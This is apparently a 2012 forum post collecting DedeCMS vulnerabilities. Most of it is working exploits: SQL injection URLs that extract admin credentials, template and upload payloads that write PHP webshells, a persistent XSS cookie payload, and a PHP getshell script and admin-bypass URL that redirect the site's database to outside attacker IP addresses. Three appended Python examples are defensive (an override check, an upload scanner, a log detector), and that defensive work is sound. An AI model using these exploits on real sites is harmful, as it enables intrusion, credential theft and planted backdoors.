中国网络渗透测试联盟 (https://cobjon.com/)

Title: DedeCMS vulnerability summary
Author: admin
Posted: 2012-10-18 10:42
DedeCMS 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability

Register a member account and upload a piece of software; in the "local address" field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

After publishing, viewing or editing the entry executes the code.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

This writes x.php with password xiao, a ready-made one-line shell.
DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe

http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS (all versions) gotopage parameter XSS vulnerability

1. Copy and paste the URL below into the browser. This triggers the XSS and installs the XSS "rootkit" (the decoded payload stores itself in a gotopage cookie that persists for a year). Note that IE8/9 and similar browsers intercept URL-based XSS, so their XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, visiting either of the URLs below triggers our XSS regardless of the gotopage value.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell

The script below posts to plus/mytag_js.php with _COOKIE[GLOBALS][cfg_db*] parameters that point the site at an external database; the tag remote file write entry further down uses the same override by hand.

#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/

[DedeCMS site backend]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

Prerequisite: the backend path must be known for this to work.
DedeCMS (织梦) tag remote file write vulnerability

Prerequisite: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit the form below; the shell is 1.php in the same directory. Work out the principle yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
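The getshell script, the backend-bypass URL and the mytag_js.php form above all rely on one mechanism: a request parameter named _COOKIE[GLOBALS][cfg_...] or _POST[GLOBALS][cfg_...] ends up overwriting the site's database settings, so the application connects to a database the attacker controls. The Python model below is an added example, not DedeCMS code. It reproduces the register-globals style merge in miniature and then shows the kind of check later DedeCMS releases apply: rejecting request variable names that begin with cfg_, GLOBALS, _GET, _POST or _COOKIE (the original check only blocked names starting with cfg_, which the GLOBALS wrapper sidesteps; both details are stated from memory and marked as assumptions in the code). The host value in the constructed request body is a placeholder.

```python
import re
from urllib.parse import parse_qs

# Constructed configuration, standing in for what DedeCMS loads from its
# config file before the request variables are merged in.
BASE_CONFIG = {
    "cfg_dbhost": "localhost",
    "cfg_dbuser": "site",
    "cfg_dbpwd": "site-pw",
    "cfg_dbname": "site",
}

# Request variable names that must never come from the client.  Assumption:
# this mirrors the prefix list the project's later request check rejects;
# the vulnerable versions only blocked the cfg_ prefix.
FORBIDDEN_KEY = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def parse_php_style(query: str) -> dict:
    """Parse a query/body string into nested dicts the way PHP does for
    bracketed names: '_COOKIE[GLOBALS][cfg_dbhost]=x' becomes
    {'_COOKIE': {'GLOBALS': {'cfg_dbhost': 'x'}}}."""
    result: dict = {}
    for raw_key, values in parse_qs(query, keep_blank_values=True).items():
        parts = re.findall(r"[^\[\]]+", raw_key)
        node = result
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = values[-1]
    return result


def register_globals_merge(config: dict, request: dict) -> dict:
    """Model of the insecure pattern ('${$_k} = $_v' over every request
    variable).  A request key named _GET/_POST/_COOKIE replaces that
    superglobal, which is then walked in turn; a key named GLOBALS lands
    on top of the configuration array itself.  Simplified model, not PHP."""
    globals_table = dict(config)
    pending = [request]
    while pending:
        variables = pending.pop()
        for key, value in variables.items():
            if key in ("_GET", "_POST", "_COOKIE") and isinstance(value, dict):
                pending.append(value)        # overwritten superglobal is processed next
            elif key == "GLOBALS" and isinstance(value, dict):
                globals_table.update(value)  # this is the configuration override
            else:
                globals_table[key] = value
    return globals_table


def check_request(request: dict) -> None:
    """Hardened variant: refuse any client-supplied variable whose name could
    shadow configuration or a superglobal, before any merge happens."""
    for key in request:
        if FORBIDDEN_KEY.match(key):
            raise ValueError(f"request var not allowed: {key}")


def effective_config(body: str, hardened: bool) -> dict:
    """Database settings the application would use for this request body."""
    request = parse_php_style(body)
    if hardened:
        check_request(request)
    merged = register_globals_merge(BASE_CONFIG, request)
    return {k: merged[k] for k in BASE_CONFIG}


def is_rejected(body: str) -> bool:
    """True when the hardened check refuses the request outright."""
    try:
        effective_config(body, hardened=True)
    except ValueError:
        return True
    return False


# Constructed request body in the shape of the mytag_js.php form above;
# the host is a placeholder, not the address used in the post.
EXPLOIT_BODY = (
    "doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=attacker.example"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&nocache=true"
)
BENIGN_BODY = "doaction=x&nocache=true"

if __name__ == "__main__":
    print("vulnerable:", effective_config(EXPLOIT_BODY, hardened=False))
    print("hardened rejects exploit:", is_rejected(EXPLOIT_BODY))
    print("hardened accepts benign:", effective_config(BENIGN_BODY, hardened=True))
```

Run it and the vulnerable path reports cfg_dbhost as attacker.example while the hardened path refuses the request before the merge; the benign body passes both paths with the original configuration intact.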
DedeCMS <= V5.6 Final template execution vulnerability

1. Register a user, go into the member backend, publish an article and upload an image; then, under attachment management, replace the image with our crafted template. For example, the image name is:

uploads/userup/2/12OMX04-15A.jpg

The template content is (if image formats are restricted, prepend gif89a):

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and construct a form:

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two inputs are the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if the site reports that the edit succeeded, the template path has been changed.

3. Visit the modified article. Assuming the article just edited has aid 2, we only need to request:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is created in the plus directory.
DedeCMS website management system getshell vulnerability (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save this as 1.gif.

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after the upload the image is saved as /uploads/userup/3/1.gif.

Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
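The template execution entry and the getshell entry above both hide a DedeCMS tag with runphp='yes' (or a {dede:php} block) inside a file that is uploaded as an image, with Gif89a prepended so that a magic-byte check passes. The scanner below is an added example, not part of this post or of DedeCMS: it walks an uploads directory and flags any file containing those markers or a raw PHP open tag, deliberately ignoring the GIF header. The sample files are constructed in a temporary directory from the payloads quoted in this post, plus one genuine minimal GIF that must not be flagged.

```python
import re
import tempfile
from pathlib import Path

# Markers that have no business inside an image or attachment under uploads/:
# a DedeCMS tag carrying runphp='yes', the {dede:php} tag, or an inline PHP tag.
TEMPLATE_EXEC = re.compile(
    rb"\{dede:\w+[^}]*\brunphp\s*=\s*['\"]?yes"   # {dede:field ... runphp='yes'}
    rb"|\{dede:php\}"                             # {dede:php} ... {/dede:php}
    rb"|<\?php|<\?=",                             # raw PHP
    re.IGNORECASE,
)


def scan_upload(path: Path) -> list:
    """Return the suspicious markers found in one file (empty list = clean).
    The GIF header is not trusted: the samples in this post prepend Gif89a
    precisely to get past a magic-byte check, so the whole body is searched."""
    data = path.read_bytes()
    return [m.group(0).decode("latin-1") for m in TEMPLATE_EXEC.finditer(data)]


def scan_uploads(root: Path) -> dict:
    """Walk an uploads directory and map each flagged file to its markers."""
    report = {}
    for file in sorted(root.rglob("*")):
        if file.is_file():
            hits = scan_upload(file)
            if hits:
                report[file.relative_to(root).as_posix()] = hits
    return report


def build_sample_tree(root: Path) -> None:
    """Constructed samples: two 'images' carrying the template payloads quoted
    in this post, and one real (1x1 pixel) GIF that must stay clean."""
    (root / "userup/3").mkdir(parents=True)
    (root / "userup/2").mkdir(parents=True)
    (root / "userup/3/1.gif").write_bytes(
        b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}"
    )
    (root / "userup/2/12OMX04-15A.jpg").write_bytes(
        b"{dede:name runphp='yes'}\n$fp = @fopen(\"1.php\", 'a');\n{/dede:name}"
    )
    (root / "userup/2/real.gif").write_bytes(
        b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
        b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
    )


def demo() -> dict:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_uploads(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {hits}")
```

Pointing scan_uploads at a real uploads/ tree is the practical use; on the constructed tree it flags the two payload files and leaves real.gif alone. The regex is a quick triage filter, not a parser: the toby57 attribute-injection payload from the embedded-code entry earlier in this post does not use runphp and needs its own rule.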
DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, giving a 20-character MD5; to get the 16-character MD5 from that, remove 3 more characters from the front and 1 from the end.
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability

This combines two things: a MySQL numeric overflow that triggers a database error, and DedeCMS recording database error messages in a PHP file whose header is never validated.

1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

The error message is displayed.

2. Visit http://www.abc.com/data/mysql_error_trace.php. Seeing the following output proves the injection succeeded:

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php file injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
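Most entries in this post are single URLs or form posts, which makes them easy to spot in web server access logs after the fact. The detector below is an added example, not from the post or from DedeCMS: it parses combined-format log lines, URL-decodes the request target twice (so a double-encoded variant decodes to the same text), and applies one rule per attack family listed here (GLOBALS configuration override, the sql= parameter of advancedsearch.php, updatexml()/extractvalue() error-based injection, markup in gotopage, traversal in the oldface parameter of edit_face.php, and a POST to mytag_js.php, which the site normally fetches with GET). The log lines are constructed with documentation IP addresses and shortened copies of the payloads above.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log lines (combined format).  They mirror the request
# shapes in this post; the IPs are documentation addresses, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:02 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.6 - - [18/Oct/2012:10:42:03 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 10 "-" "Mozilla/5.0"
203.0.113.8 - - [18/Oct/2012:10:42:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(String.fromCharCode(80,101))%3C/script%3E HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Oct/2012:10:42:06 +0800] "GET /plus/rss.php?tid=1&_Cs[2))%20AND%20updatexml(1,(SELECT%201),1)%23'][0]=1 HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
198.51.100.2 - - [18/Oct/2012:10:42:07 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
198.51.100.3 - - [18/Oct/2012:10:42:08 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per attack family in this post, applied to the decoded request target.
RULES = [
    ("config override via GLOBALS in request",
     re.compile(r"(?:_GET|_POST|_COOKIE)\[GLOBALS\]|\bGLOBALS\[cfg_", re.I)),
    ("raw SQL passed to advancedsearch.php",
     re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I)),
    ("error-based SQL injection function",
     re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("markup injected into gotopage",
     re.compile(r"[?&]gotopage=[^&]*<", re.I)),
    ("traversal in oldface deletion",
     re.compile(r"/member/edit_face\.php\?.*dopost=delold.*\.\./", re.I)),
]


def normalise(target: str) -> str:
    """Decode the request target twice so single- and double-encoded
    payloads compare as the same text."""
    return unquote_plus(unquote_plus(target))


def classify(line: str) -> list:
    """Return the names of every rule the log line matches (empty = clean)."""
    match = LOG_RE.match(line)
    if not match:
        return []
    target = normalise(match.group("target"))
    hits = [name for name, rx in RULES if rx.search(target)]
    # mytag_js.php is included with GET by the site's own pages; a POST to it
    # is the shape of the variable override exploit.
    if match.group("method") == "POST" and "/plus/mytag_js.php" in target:
        hits.append("POST to plus/mytag_js.php")
    return hits


def scan(log_text: str) -> list:
    """Scan a whole log and return (client ip, path, rule names) per flagged line."""
    findings = []
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            match = LOG_RE.match(line)
            findings.append((match.group("ip"), match.group("target").split("?")[0], hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path}: {', '.join(hits)}")
```

On the constructed log this flags six of the eight lines and leaves the two ordinary requests (plus/view.php and a plain rss.php feed fetch) alone. Form bodies are not in an access log, so the runphp template uploads need a file-side check rather than a log rule.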